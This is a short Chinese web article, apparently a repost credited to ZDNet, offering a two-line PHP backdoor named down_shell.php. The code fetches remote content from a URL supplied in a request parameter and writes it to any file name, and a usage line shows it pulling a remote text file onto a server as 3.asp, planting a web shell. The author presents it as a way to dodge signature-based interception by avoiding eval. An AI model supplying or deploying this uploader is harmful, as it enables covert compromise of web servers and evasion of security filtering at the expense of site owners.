突破一流拦截的php代码

2015 年 1 月 17 日2930

突破一流拦截的php代码

ZDNet 攻击防范 来源: zdnet整理 2011年09月01日

关键词: 网络安全 网络入侵

本文摘要

 代码很简单。 为什么都要用EVAL execute 来做后门呢,貌似这样做 也能起到后门的作用。而且不易被特征。

  down_shell.php -可过一流信息拦截

  php

  $str=file_get_contents($_GET['url']);

  echo file_put_contents($_GET['file'],$str);

  ?>

  use: ?url=http://http://www.zjjv.com///1.txt&file=3.asp

  代码很简单。 为什么都要用EVAL execute 来做后门呢,貌似这样做 也能起到后门的作用。而且不易被特征。

本文导航

转发

0 0